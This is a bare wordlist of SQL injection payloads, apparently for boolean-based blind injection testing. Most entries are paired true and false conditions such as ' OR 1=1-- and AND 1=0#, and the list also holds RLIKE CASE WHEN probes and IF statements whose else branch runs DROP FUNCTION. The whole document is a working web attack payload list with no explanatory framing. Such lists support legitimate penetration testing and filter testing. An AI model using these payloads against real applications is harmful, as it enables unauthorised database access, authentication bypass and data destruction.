' OR 1=1
' OR 1=0
' OR x=x
' OR x=y
' OR 1=1--
' OR 1=0--
' OR 1=1-- -
' OR 1=2-- -
' OR 1=1#
' OR 1=0#
' OR '1' = '1
' OR '1' = '2
' OR '1' = '1' -- -
' OR '1' = '2' -- -
HAVING 1=1
HAVING 1=0
HAVING 1=1--
HAVING 1=0--
AND 1=1
AND 1=0
AND 1=1--
AND 1=0--
AND 1=1#
AND 1=0#
1 OR 1=1 -- -
1 OR 1=2 -- -
1' AND 1=1 --
1' AND 1=2 --
1 AND 1=1 -- -
1 AND 1=2 -- -
%' AND 8310=8310 AND '%'='
%' AND 8310=8311 AND '%'='
RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl--
IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl--